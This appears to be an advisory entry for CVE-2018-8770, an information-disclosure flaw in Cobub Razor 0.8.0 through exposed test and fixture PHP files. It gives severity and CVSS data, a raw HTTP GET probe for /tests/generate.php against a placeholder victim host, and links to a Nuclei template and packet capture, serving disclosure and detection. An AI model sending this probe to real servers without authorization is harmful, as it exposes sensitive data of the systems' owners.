| Title | Cobub Razor 0.8.0 - Information Disclosure |
|---|---|
| Author | princechaddha |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to gain sensitive information. |
| Remediation | Upgrade to a patched version of Cobub Razor. |
| CVSS Score | 5.3 |
| EPSS Score | 0.58047 |
| CVE ID | CVE-2018-8770 |
| CWE ID | CWE-200 |
| Tags | cve cve2018 cobub razor exposure edb vuln |
Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
GET /tests/generate.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-8770.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-8770.pcap
N/AN/A